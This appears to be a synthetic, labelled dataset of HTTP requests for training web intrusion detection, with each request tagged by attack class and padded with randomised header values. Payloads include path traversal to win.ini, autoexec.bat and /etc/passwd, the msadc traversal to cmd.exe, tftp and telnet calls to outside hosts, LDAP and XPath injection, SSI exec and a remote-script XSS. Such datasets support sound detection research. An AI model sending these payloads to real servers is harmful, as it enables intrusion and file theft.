Transfer-Encoding: emtc; saTe=ao9r15
Upgrade: roeie/1.4
Warning: 961 59.212.87.203:1 "2ryq" "Mon, 19 Mar 07 07:17:54 UTC"
X-Forwarded-For: 196.41.114.153
X-Serial-Number: 52344762655816
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46254
Start - Id: 49956
class: XPathInjection
GET /hua5osHbl/jQ/s9oe/XRp_selectVUrIR/mfB/tnebstdoti/t3673lIsE2/tae8l/uu/nrdM/ijNELyeUbilJAaQh30a.bin?ekEreepthnnr=s6ROGujb_I&iToinsofdEQetf=hxaC5GKLk&ueuediaJaa3y2e=283208&ydehOc=4b&Otrinnennaoh=nIB.&e0vscundaatv62l=kjtcra&yCzaOoranlTytl=524&waxaOuc3ct3=hlo%3Dhtacces&1aoncrcj=aposition%26sbimwindow.openwinnthcd%5Be9&bw=niTA&iYwhereN-passthruBW=sreenrr%27++++or++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+or+%27uv%27++%3D++++%27&elbenaounabrsm=3IHbuDduX_&lneeui=lr%2Bh%3Cr1-q&AeIu=swBij+asG HTTP/1.0
Host: 246.67.91.201:88
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: x-mac-arabic, x-mac-korean;q=0.2
Accept-Encoding: 
Accept-Language: xi-3c;q=0.3, mnrurs7d-00;q=0.9, loresero-fp5eAwa, vgzotetS-nmdw, too8t-ep9h
Cache-Control: igr=hb
Client-ip: 6.57.199.123
Cookie: zi6ibT=91634;THLxtermyVxml=rBhTD3jadR;4e0see=aidahodhbItdobjectok;xzeo=6 4
Cookie2: $Version="9"
Date: Mon, 21 Jul 08 24:07:15 GMT
ETag: W/"Iy_DNmlUhoJDmsXeKRd"
Expect: 100-continue
From: thnep@gnfilnelrR.biz
If-Modified-Since: Sun, 05 Feb 06 04:32:24 CET
If-Unmodified-Since: Tue, 26 Apr 05 14:07:42 UTC
If-Match: "g2sH@cRsy4dKvnb_"
If-None-Match: "zNX.NeWuwJFY-Fw."
If-Range: *
Max-Forwards: 6
MIME-Version: 0.7
Pragma: wj='reioOri'
Proxy-Authorization: NTLM ZWNuN2NibnJlbjJqZ253bWVlcnRXZmRvc2xvdmxubGllY2FyZWl3ZXBOd2w=
Authorization: evwOlt lsy3mt=9sciu
Range: 88781-3
Referer: /lpq9h/sqniznh/5weopT8e.txt
TE: trailers,deflate;q=0.2,gzip;q=0.8
Trailer: If-Match
User-Agent: Mozilla/5.4 (Windows; U; Windows NT 8.1; lu-ry; rv:5.6.7) Gecko/31942983
UA-CPU: x86
UA-Disp: 2308,4283,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 207x5488
Via: 7.6 www.raIoepx.js:56
Transfer-Encoding: wtev
Upgrade: d4T/6.8, oecM/8.1, tgey/1.2, v4dyl/2.5
Warning: 631 www.reelek.js "sooCrilind" 
X-Forwarded-For: 43.162.129.161
X-Serial-Number: 84157643689
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49956
Start - Id: 45047
class: PathTransversal
GET /error/\..\..\..\..\winnt\win.ini? HTTP/1.0
Host: 11.32.145.113
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: compress;q=0.8
Accept-Language: ee-i;q=0.6, m5-wo6ul;q=0.5
Client-ip: 0.96.11.108
Date: Wed, 02 Feb 05 17:00:10 UTC
Expect: 100-continue
From: Otai@40ezesm.uk
If-Modified-Since: Sat, 01 Dec 07 15:54:58 CET
If-Range: *
Max-Forwards: 87
Authorization: cE5iL lpoedma=liu8fitt
Referer: http://3iag.uk/stdarNyc/ttuHpn.asmx
User-Agent: Mozilla/1.4 (compatible; Konqueror/5.4; Win 9x; trlu; 1daSrteo1c; oyn4ieatr)
UA-CPU: PowerPC
UA-Disp: 7777,3718,16
UA-OS: Windows 95
UA-Pixels: 147x245
X-Serial-Number: 986205312934896
----: ----------------------------

null

End - Id: 45047
Start - Id: 38652
class: LdapInjection
GET /xP3lmgk-Ykb8WOo.js?0et=%29++++%28++%7C+%28displayName%3Dhad*%29%28name++%3D++++had*+%29%28mail%3Dhad*+++%29&rSUers1e8iAgo=ie HTTP/1.0
Host: www.eenc8enigD.uk
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.2
Accept-Encoding: identity
Accept-Language: *
Cache-Control: max-age=938
Client-ip: 48.249.181.128
Cookie: 4pee=a.vF6.l;za4dnhnqcyesto=9126;ynO9no=mo1smnti4am4tbe;6e92D1vdocument8n=i9WwZB9x_hi
Cookie2: $Version="2"
Date: Tue, 11 May 04 03:04:48 CET
ETag: "eyDCB5QN-Yd1FZKT8r1y"
Expect: wof9
From: t4byed8@l9nss.fr
If-Modified-Since: Tue, 23 Jun 09 15:16:06 UTC
If-Unmodified-Since: Sun, 30 Jul 06 09:54:28 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Basic YUtqaWUxOmFkTHI=
Authorization: NTLM ZWkyb2lrbmVBbGVnbjFxQWV0Ym43eXllZXd1dGFydHRpdm5ibGtwZmVjb2VtZQ==
Range: 6-,-12392,3-
Referer: http://www.q5enylh.com/siuSd/heexA/unhxan.jsp
TE: chunked;q=0.2,gzip;q=0.4
Trailer: Accept-Encoding
User-Agent: iaEnSheHtbriae8tmVm
UA-CPU: PowerPC
UA-Disp: 397,637,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 774x1723
Via: 1.4 www.gxei.shtml:2, FTP/7.4 www.lzSt.js
Transfer-Encoding: compress
Upgrade: ehlec/7.4, tt07/0.9, ls7e/0.7
Warning: 923 31.36.82.245:31824 "1y3pAs" "Sun, 03 Oct 04 18:11:26 UTC"
X-Forwarded-For: 72.129.37.147
X-Serial-Number: 15901278083
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38652
Start - Id: 36932
class: LdapInjection
PUT /qcinlrsssEuegc/s38Pm5n8g5l/pw-plFO39eG/httlnM5EUnuetm/5a2x_.2Z/wL@DVWj6@k7hm/cdagoemofl/m-5oDRYw_n/uKY92.mdb? HTTP/1.0
Content-Length: 226
Content-Language: n,am9jna
Content-Encoding: compress
Content-Location: /rtenri/epReTAo/m7eeni.asp
Content-MD5: b3J0VGxvdHVsbGVzc2N0bw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 19 Apr 05 04:41:19 UTC
Last-Modified: Mon, 06 Sep 04 09:27:29 GMT
Host: 205.94.32.248
Connection: close
Accept: text/html;q=0.0, audio/*;q=0.7
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: tbnIlM-lp, Rutvna-yc, u-ce, 5a-mi8ab1j, udif-jea
Cache-Control: max-age=2
Client-ip: 162.232.160.26
Cookie: Ht=ltDhinput%iechoEecuelae kr;qen7caoteto=dsyigceew;;beilqsal0ui=42684;lmlXS0al=b;PYM63betweenN3dP=2717525
Cookie2: $Version="1"
Date: Wed, 24 Jan 07 06:56:53 UTC
ETag: W/"VLYpnQMTVayQbUA@8m@f"
Expect: 100-continue
From: nareu4te@pple4n.it
If-Modified-Since: Tue, 30 Jan 07 24:04:59 UTC
If-Unmodified-Since: Wed, 28 Jan 04 18:59:20 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 55
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Basic NG9lYWFkZTM6b25zZXhzdGM=
Authorization: Digest uri=/uxGnm/snyrno/himrt.css
Range: -312
Referer: /oolty/odi2ou.pl
TE: deflate;q=0.5,gzip;q=0.1
Trailer: Accept
User-Agent: Mlp7uTlao/2.4.0.2.5
UA-CPU: StrongARM
UA-Disp: 0609,6015,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 015x0585
Via: 8.7 133.129.254.83, 8.7 225.162.81.219, FTP/0.8 www.Tai5ed0.htm
Transfer-Encoding: anaeip; aruqea=n4he0rf9
Upgrade: ejsf/1.7, lxAe/6.8, 3Tuete/5.0
Warning: 200 169.156.209.196:92 "0oiSeraRieyyto" "Thu, 26 Aug 04 15:57:50 UTC"
X-Forwarded-For: 189.182.231.41
----: --------------------------------------
~~~~~: ~~~~~~~~~~

e8nnsooi=sA5y&oidlassIetc=oXuri&XnIxvdM=jnpEtsfsfe&osnI7=8nWbsnrieidwdR&6i5maaeTaArnemq=psan o&dsodPr=1672542773&elatsi0jlMioAig=003730405&de=4iah&elnK=sc&ojh2r=dhrnaonoir&FshF=")(targetfilter=(o=NetscapeRoot))

End - Id: 36932
Start - Id: 40083
class: SSI
GET /nmLGM.zrTPSPKvObb8t/ykT5EDnxUfe-/h92l/mEJq-@NnoM9O_Y1h/eQIW3vZqAiNG/q_9N/isj1tw3dtrl4h.jpg?etmRb4es=tleahxterm&pieritm=%24atnnNlse&.kidFjJsvarL=6&6Meew=%3C%21--+++%23exec+++cmd%3D%22%2Fbin%2Fls+++++-l+++++%2Fhome%2F8ss5cnguui%2FejajgB%22+++++--%3E&@gaJ6usriframe278Dc=libo%2BolyuRrehhcopy&jvf2HSj.0d@=597581&0LSwiframeACDnN=731&ku1hce4bsaatcs=o+%3Fe&nhiop=dnxucAiKnn HTTP/1.1
Host: www.3slhn.ch
Connection: keep-alive
Accept: audio/basic, text/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: anrsan6-ps;q=0.1, m1oretae-kl0a
Cache-Control: max-stale
Client-ip: 104.246.56.142
Cookie: gal4eWrb2n=9;ontaoe8jpe6=armxydghetsaw1;E0poidsdrw=ioconnect;uqyj=62;uTthHbt=315680;tsnbhret5wn=a
Cookie2: $Version="080"
Date: Wed, 18 Aug 04 06:01:49 UTC
ETag: "TgQ-.pmDMkPUc62"
Expect: 0ugtrh
From: hbdwf2hh@oEzag3e7.de
If-Modified-Since: Sun, 23 Aug 09 23:08:47 GMT
If-Unmodified-Since: Tue, 21 Oct 08 01:50:14 UTC
If-Match: "Cc@XhyY16axHw2-0"
If-None-Match: "SVYAoxW5d9NmkPUp"
If-Range: Thu, 03 May 07 10:24:44 CET
Max-Forwards: 64
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: mshe trCer=de1seo
Authorization: NTLM c29kZ2NpaXNhOWVuYmVvcmVpczZ0QmFTc29pcmkxZm9zZXRhdg==
Range: -170
Referer: http://www.oiro0n.net/vEojr/srzesIl.sh
TE: gzip;q=0.0
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.6 (Machintosh; U; PPC 1.6; 1a-hi; rv:4.4.3) Gecko/12961352
UA-CPU: MIPS
UA-Disp: 952,4343,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 0944x596
Via: HTTP/9.3 249.51.212.194, FTP/5.4 www.hf3oyro.html
Transfer-Encoding: Redce
Upgrade: uts3/8.2, hd4uvh/2.4, a6sol/2.3, yce/9.7, cnsH/1.9
Warning: 187 www.s2nfht.shtml "Idhcekl" 
X-Forwarded-For: 64.201.70.142
X-Serial-Number: 9018401167222078
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40083
Start - Id: 35991
class: PathTransversal
POST /ttNtFe8ejinrdnsa/ionIamReaain/mrae/m4qObIrq2cx18_./0-OByyX4tN3LnD5X/3@perlULvCfJVTOG/4oEth/edWtK5c8/l.VQ.OtxiC3I/rewpsDUOLXQEX/h_nBZz.php3? HTTP/1.1
Content-Length: 165
Content-Language: t
Content-Encoding: identity
Content-Location: /adcK9/eeed/ttemiisn/sesemA.ace
Content-MD5: bHNmZWFkc3JsZWd0aGxlaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 26 Aug 04 12:48:27 CET
Last-Modified: Sun, 19 Aug 07 13:02:45 GMT
Host: 69.18.175.118
Connection: an5i6sdl
Accept: */*;q=0.2
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 11.175.85.5
Cookie: eatlpa3teDu=390;2ets3=lzpof;pecgge=d'3tt;2qPAxKhCMi=07;TGnjcvoe=phaving;erizuseemAonATt=99
Cookie2: $Version="232"
Date: Mon, 12 Sep 05 01:05:03 UTC
ETag: W/"Ek3BXcozS.u2Oc09Vcd"
Expect: 100-continue
From: hacs@cltuesA.com
If-Modified-Since: Mon, 13 Dec 04 10:30:50 GMT
If-Unmodified-Since: Wed, 13 Sep 06 15:25:08 CET
If-Match: "v_cwi9t0WfCQg9-Qhh"
If-None-Match: *
If-Range: Mon, 01 Dec 08 01:46:02 UTC
Max-Forwards: 9
MIME-Version: 5.1
Pragma: yiene3ai='roxtNSns'
Proxy-Authorization: Basic bmlscm5ndDpkMjh1YWE5
Authorization: Digest opaque="zhbe"
Range: 799-,4-,-692713
Referer: /n38a/6nRo/Dhorir/ddybsn.nsf
TE: chunked,trailers,chunked
Trailer: Accept-Encoding
User-Agent: fAaeacyc
UA-OS: Win98
Via: HTTP/6.1 59.149.130.67, 7.8 181.30.123.181, 5aodr/6.6 124.179.236.156:9
Transfer-Encoding: ntnn
Upgrade: uUi/7.8, eeds/2.6, Myede/4.4
Warning: 420 www.esiroa.js "tdoieaa" "Wed, 03 Jan 07 09:34:59 GMT"
X-Forwarded-For: 133.228.168.254
~~~~~: ~~~~~~~~~~~~~~~~~~~~

dh92ldsu=se&imgEEwnTovarBTIk=../../../../../../WINNT/autoexec.bat&LMkq=beOebji&estsmti=tera&ynegbihd4r=75258&i0ctRNtus=s0avttn9&tndelqevenoyt=0oeustcaa

End - Id: 35991
Start - Id: 42976
class: OsCommanding
GET /pg/t5-ol/cWLO@/7iframeZM/jlw2U/oUoJZ5338hdrTYbG5p8/1LUgfeutitoc/e_y7PM8MAdzj5z.jpeg?BvR1CstdinK6script=eda%2Feo&718-KQE=Oyal2q&o93gfbAettrclc=s3B3.1-wR&aa=3 HTTP/1.1
Host: 192.34.88.151:79737
Connection: ataithid
Accept: video/mpeg, text/xml
Accept-Charset: windows-1257;q=0.4, windows-1254;q=0.7, koi8
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=530
Cookie: halupebcehoerp='   ;    tftp    -c  get www.rege.com:/vellge.tar
Cookie2: $Version="97"
Date: Fri, 21 Dec 07 12:19:54 UTC
ETag: W/"iI.9Av9VWmhJ.bRxTS"
Expect: ioOt=7ort
If-Modified-Since: Fri, 17 Jun 05 13:33:16 CET
If-Unmodified-Since: Tue, 31 Oct 06 23:03:17 UTC
If-None-Match: *
If-Range: *
Max-Forwards: 896
MIME-Version: 4.8
Range: -7,-199555
Referer: /idtd0ota/Aein7/hezten.dll
User-Agent: Mozilla/6.0 (Windows; U; Windows NT 7.1; hn-ns; rv:6.8.7) Gecko/92623713
UA-CPU: x86
Via: 5.6 177.237.139.122:0097, gpre3m/4.1 www.esnrko.htm

null

End - Id: 42976
Start - Id: 49056
class: XPathInjection
GET /diireneona8cm6ojct/wifeudosep1q/zKlulprocessing-instructionGIyD/naoiam2jpryVtwsresge/cY6M0Z.css?mx8EeghuiLamsn=6161&xomlyncrrnaoi=e0+Okdvbscript6ud&mg83bzi=osla4&ueIjl2n=17523&nebraihEotAdn=2144826&rro=eoT3sFNrMdNV&osafh0ted9teee=60&oimeO4x36X=038877313&o4Mamon9bennk=d5sast0%27%5D+++++%7C++++P++%7C++++%2F%2Fuser%5B++++name%2Ftext%28%29%3D+++%27eas&kaolO4tapnoeb=140683&7gtte7btdeie=o HTTP/1.0
Host: 82.86.8.119
Connection: oeen64of
Accept: audio/*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-stale=89447
Client-ip: 20.81.251.104
Cookie: taso42=nN<|D ceed ;Cuc7vBszTn=sFNzw;tnu=6;ktmtshe=r6XikCxKvh;1aednajoEwtpc=nnulla+imgeBlrmsribtsN
Cookie2: $Version="41"
Date: Sat, 08 Apr 06 03:23:05 UTC
ETag: "Rts2dC5s1wzXOEQErdDA"
Expect: P7nlnno=i8ing;eEwjfHro
From: thhe@eis9.be
If-Modified-Since: Mon, 22 Mar 04 20:16:08 GMT
If-Unmodified-Since: Thu, 24 Jun 04 09:01:07 GMT
If-Match: "A1T.lpDKKafeYEimgvF"
If-None-Match: *
If-Range: *
Max-Forwards: 030
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: NTLM aHJ0aW5wc0Vpb3JnMW90aW1waHMzbXQzbXMza3FPdGFhc2lvaGRhZHY=
Authorization: Basic Nmd2aDpOZm54aW4=
Range: 15125-,9750-
Referer: /yr3a/yiklaoao/Rstd/rSAOr2e/isnctolu.asmx
TE: trailers,trailers
Trailer: Referer
User-Agent: Mozilla/3.7 (Machintosh; U; Mac OS X 5.7; at-eh; rv:9.0.2) Gecko/26917094
UA-CPU: x86
UA-Disp: 357,241,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 003x367
Via: HTTP/5.8 www.srpoanr.css, FTP/9.7 174.224.157.210:69912, 5.6 www.ash3ta.html
Transfer-Encoding: s4nese
Upgrade: BzRA/3.7, eSa/6.4, DCeds/5.7
Warning: 712 141.86.56.222 "RenNkwhed" "Fri, 05 Oct 07 19:54:02 GMT"
X-Forwarded-For: 161.22.54.66
X-Serial-Number: 00114
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49056
Start - Id: 43684
class: OsCommanding
GET /msadc/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 25.80.125.135
Connection: keep-alive
Accept: text/*, text/xml, text/xml
Accept-Charset: *;q=0.4
Accept-Encoding: deflate, deflate
Accept-Language: *
Cache-Control: min-fresh=73353
Client-ip: 149.80.234.160
Cookie: Ni8Mzwp7x=6613333230;jCK4Q_t9=dmeilnuadte
Cookie2: $Version="4"
Date: Tue, 09 May 06 21:53:32 GMT
ETag: "Ypk8OsVE4.PySPp"
Expect: 100-continue
From: o68nO@tetn70i.cz
If-Modified-Since: Wed, 08 Dec 04 23:11:12 GMT
If-Unmodified-Since: Mon, 13 Mar 06 12:28:26 GMT
If-Match: "w@QVjMuwwxTIbtY6"
If-None-Match: *
If-Range: *
Max-Forwards: 27
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Basic cWlyaWNibjplb241ZWdp
Authorization: Digest algorithm=MD5
Range: 0932-655,7-822597,-7
Referer: http://uualyj.ch/gebdutmi.cgi
TE: chunked,trailers,chunked
User-Agent: Mozilla/3.4 (Windows; U; Win98 9.1; at-Ee; rv:1.7.2) Gecko/64631206
UA-CPU: PowerPC
UA-Disp: 0760,6921,16
UA-Color: color16
UA-Pixels: 827x275
Via: FTP/5.4 225.14.219.189
Transfer-Encoding: leanot
Upgrade: akEzd/2.3, jeaovc/8.8, iti/8.8, Yya3/8.2, lrscJp/3.7
Warning: 267 17.232.146.208 "uEwtOaeI" "Fri, 11 Sep 09 24:54:08 CET"
X-Forwarded-For: 163.232.189.112
X-Serial-Number: 181822248668347
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43684
Start - Id: 38671
class: LdapInjection
GET /mcWAuBf/9HrELp/rT/eoRnaldnl/gmPz3M4edR9Q2n8AIu/95Tnh0obuuda5sh/Uh8d1oct/sadIiariHjpugltlS/h@Gm6w/riem1pyir4ac5dc7epr/06D@rubAIzuti1ALg/pwpQJ.tiff?t4e3l9monc=3noU&n7gmtrtoeaL=tfJF3Z&e4sais=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&iag0=514347&sgoo5soutapwn=neu&tuJBiL8w@=1&dxnrmfizicAtm=2165 HTTP/1.1
Host: www.genum7.fr
Connection: keep-alive
Accept: image/jpeg;q=0.6, video/*;q=0.8, image/png;q=0.0
Accept-Charset: *;q=0.0
Accept-Encoding: compress;q=0.7, compress, compress;q=0.5
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 202.109.50.24
Cookie: z3yetcu7RyC=chterh>k;EmholsdI9be=dwU;mh=992;x9=surlaerlotlealejoT;gicnb=31391848
Cookie2: $Version="8"
Date: Fri, 10 Apr 09 11:51:31 UTC
ETag: W/"O9@O-jxY9.LjYLQO"
Expect: eees1
From: 0dbnE@pDEweao.biz
If-Modified-Since: Sat, 07 Nov 09 18:36:44 CET
If-Unmodified-Since: Mon, 01 Jun 09 12:39:01 CET
If-Match: "rkeIlLUNvrgOuws"
If-None-Match: *
If-Range: Fri, 12 Mar 04 07:15:16 CET
Max-Forwards: 306
MIME-Version: 9.7
Pragma: n='Yse'
Proxy-Authorization: Basic ZTNpZGlzYzp0czFtb2VmYw==
Authorization: Basic ZHVlZTM0aG06ZnM4b2g=
Range: -3789,-5,300-00360
Referer: /digieTlw/9Alzw7J/deMrnhoe/i2t1o.php4
TE: deflate
Trailer: Accept
User-Agent: Mozilla/5.9 (X11; U; Unix 8.6; ee-st; rv:6.1.6) Gecko/49171501
UA-Disp: 0550,3953,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 7709x7356
Via: o1r/1.1 www.nhorlir.htm, FTP/1.2 85.224.226.63
Transfer-Encoding: usdn
Upgrade: anRsj/9.4, 58agtG/6.3
Warning: 305 238.247.93.80 "Nuabb" "Sun, 18 Apr 04 12:03:03 UTC"
----: -------------------

null

End - Id: 38671
Start - Id: 38954
class: LdapInjection
GET /NTRKunionPu/hEphnebb6tLeet/arertn0aho45itr/mFB/h8kbn7ttrE9s.gif?iroAfdannncf=0JXs655&cn9i=hipSt&Toadv=111604&qW4YQ5opt=1e&nagap=fhrdz+on%3Apu&arTdotiutoe=eutsu&ey3m4Ul=escriptap&0insert8-Sdocument9eBZ=68&execJbCQ=93219684&x0tneoeoaxag=tinqsaeucrmtso3t&nmeoooh=%5BBgtmo&en49atir=%29++++%28++%7C++++%28ja%3Dale*%29&nuses3odb2s=opEfhhlitre HTTP/1.0
Host: 139.3.240.250:80
Connection: close
Accept: video/*;q=0.8
Accept-Charset: *
Accept-Encoding: compress;q=0.8
Accept-Language: te-s;q=0.9, clhnis6f-8tjo;q=0.9, 0id0l-tIahkikd;q=0.8, del-tYrdacL;q=0.3
Cache-Control: only-if-cached
Client-ip: 69.146.201.136
Cookie: IKuqxsystem=rVtTZO
Cookie2: $Version="1"
Date: Fri, 21 Mar 08 15:45:58 CET
ETag: "SRCGudR8eFtiS4Ao6"
Expect: 100-continue
From: merdf@ssdhtag.cz
If-Modified-Since: Wed, 19 Apr 06 22:34:26 CET
If-Unmodified-Since: Fri, 26 Jan 07 04:04:34 GMT
If-Match: *
If-None-Match: "9dX3hx96dfOrEM-zEyC"
If-Range: Thu, 29 Jun 06 04:36:29 GMT
Max-Forwards: 6997
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Basic bW9ldHRpZTp3dWt0aHNt
Authorization: NTLM cWhtYUl5c2Vkc2kxc3hlNkVkNXhBb2VTYWlodDJldGR6YkVldGJqeWU5Z2V1YmJh
Range: 678-706492,70758-,6439-
Referer: http://EwhWd.cz/yOcffof8/taah/hzciakla/za23/euapst3e.pl
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/7.7 (compatible; MSIE 1.4; SunOS sun4u; 2sEe; C4lqieea)
UA-CPU: 68000
UA-Disp: 8492,4170,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 0621x5666
Via: FTP/0.3 www.dn70eu.htm, HTTP/9.8 www.eaesn.gif, FTP/2.7 www.ttne.js
Transfer-Encoding: compress
Upgrade: hnegB/7.8, nnade/5.0, ony/9.4
Warning: 338 www.dlne.html "onaaUtdMrofTts" "Sat, 20 Nov 04 10:50:52 GMT"
X-Forwarded-For: 97.3.123.50
X-Serial-Number: 498357729
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38954
Start - Id: 35950
class: PathTransversal
GET /IljO4ZJtneqf/XepX6insertp/nco/m5AJBxOBDrqR/Zo-nullPR/em.WtsKYMdabcTF0-b/rtiaafsneeo/epn/oN95UHIiZ4NuGHQ/ntqtet04F9vshllnnre/leTsc3Eddenz.php?brddAtenmtElmos=r4euiayilsh&wlrralutrii0=%3C%21--+%23include+++++virtual%3D%22%2Fetc%2Fpasswd%22--%3E&Zxp_-4-pWaZVt=aaf%2ByheeA&oce5aoVoebyI=dp+&lPqNttnhtp=ceefrsrapsgOge&aeuclOcZ=tCY73&wesofestehs=88828&weBdtiafpa=8oj4 HTTP/1.0
Host: www.4Tneae.it
Connection: keep-alive
Accept: audio/x-wav;q=0.6
Accept-Charset: *
Accept-Encoding: compress;q=0.2, identity, compress;q=0.4, compress
Accept-Language: egrt53t-onsa;q=0.1, ore-eroat, atsR-gap
Cache-Control: no-cache
Date: Fri, 17 Apr 09 15:49:05 GMT
ETag: "SmOVj.H66CA6Jm.jjr"
Max-Forwards: 6773
MIME-Version: 9.5
Referer: http://OO9Io.uk/eEbsefg/Reehqu/aa9o/Aedr/di1t.js
User-Agent: edntHaee/9.8.7
UA-Pixels: 6901x336
Via: 7.0 www.lnoudnhg.png, 7.4 www.ial9eo.js:6

null

End - Id: 35950
Start - Id: 43323
class: OsCommanding
GET /wgenieeihii4mam4/e6.asmx?afctifu=td&fOqs=wcinttinahe&ihr=87105&ilroegddda=dr8UVO4ey&vtsddimtntlf=931&C1aoeYfmr=uhleg%7E%5Co5NS&sigFud=d5wp%40e.&P2ymailDV0=%5C%22+++%5C%3B++%5C%2Fusr%5C%2Fbin%5C%2Ftelnet+++++www.ortimadeat.com+++29347%5C%3B&uehs0ftpttyo=e%3BiUnsu08+f&i5nrawtli=82722586&1dEs=i9u%27ah+execphhonl&d2EsVv=xp_nh3bnEhTreNvariz&sir=%5Cdyey&pteocrYn=2468 HTTP/1.0
Host: 106.243.243.2
Connection: close
Accept: audio/*, audio/*
Accept-Charset: us-ascii, iso-8859-1, shift_jis, iso-8859-2;q=0.9, macintosh;q=0.6
Accept-Encoding: 
Accept-Language: at3ec8-zna, dsto-teicvmt, cc-c, ns-eE8l;q=0.9, id-leod
Cache-Control: max-stale
Client-ip: 86.69.183.54
Cookie: tam8paOmeIda=ai60zE;ezracUa=e90me;rtmp7PPSgB=nWatNmlaial;nxeqnH1i=istHsdivR;toljiao207pa=1008815205
Cookie2: $Version="3"
Date: Sun, 14 May 06 05:31:03 CET
ETag: "L6Op1aeDmT9K1KLGR"
Expect: trl2g=ErI0fhr
From: eTnr@war0.be
If-Modified-Since: Thu, 08 Jan 09 08:45:51 GMT
If-Unmodified-Since: Tue, 02 Dec 08 22:59:24 GMT
If-Match: "9FiNUJHOkAQ-9fga_ld"
If-None-Match: "yUOoh2pP7yI7Rh9uzsG"
If-Range: Thu, 29 Apr 10 20:00:33 GMT
Max-Forwards: 0181
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: NTLM aXlCUG5Zbm5ybXJ0aUZ6dG85SXdlaGVmZ2ZkaXVhZ2Rkdnlpb25saGJL
Authorization: eDloa hhEAnpe=aemiftda
Range: 2030-1
Referer: http://www.susto.st/bnRs2b/oeqfttt/Fia8i.jsp
TE: trailers,trailers,gzip
Trailer: Authorization
User-Agent: Mozilla/9.7 (X11; U; Linux i386 6.1; ys-jo; rv:6.0.6) Gecko/96738797
UA-CPU: 68000
UA-Disp: 260,218,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 3321x719
Via: N7sh/4.1 24.211.19.116, FTP/9.6 www.pshucd.jpg
Transfer-Encoding: gzip
Upgrade: s6hdl/7.5, 6rdns/6.0, wt2/7.2, trtfwt/0.2, z5mi/7.4
Warning: 213 www.e6ttha.html:3574 "evi1u0aas9lO3ep" 
X-Forwarded-For: 213.135.117.46
X-Serial-Number: 356926769417178111
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43323
Start - Id: 48071
class: XSS
GET /ucT/YNjs7nrmMhomeDv/qeL0a/onnseel7edhaoeeglti/ducHv0w.zO7q/Xzo9r4eImaE/1oWEMEo/rtg1n/nt_Jo@ZEp5xYnAqB/96FWF/orqeEhe/5bQ7ExCO.shtml?gaD=U2icf%26wmEog%7Eboot.ini%3F3ilc&sl6hn=2daE&em=eteglmm7oiStdsgts&av4=lt7n&m5oreo=e9WUy9Tx&5tXeotwlcesIc=tzJVn.Tw&ssceujt=62&ho=%3Cdiv+style%3D%22++binding%3A+++++url%28%5Bhttp%3A%2F%2Fwww.arde.com%2Fscript%2Fdalteh.jsp%5D%29%3B%22++++%3E HTTP/1.1
Host: 148.103.109.224
Connection: eKOpoe
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: no-transform
Client-ip: 185.80.82.48
Cookie: ji5canbs=68987;jnes=os;n44sIet=yRZ
Cookie2: $Version="5"
Date: Sun, 22 Mar 09 09:24:27 CET
ETag: "R5BYw6j-JCKxG5F_i"
Expect: fuezA
From: sreEas@au8Ut4bn.gov
If-Modified-Since: Sat, 25 Apr 09 01:54:50 GMT
If-Unmodified-Since: Mon, 01 Nov 04 20:19:13 GMT
If-Match: *
If-None-Match: "uq73dQZJVl33VABgs"
If-Range: *
Max-Forwards: 5877
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest algorithm=Hoedi
Range: -1,041-88,-53
Referer: http://hlat.net/sepanirs.mdb
TE: chunked;q=0.2,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: pleiwnFHrae
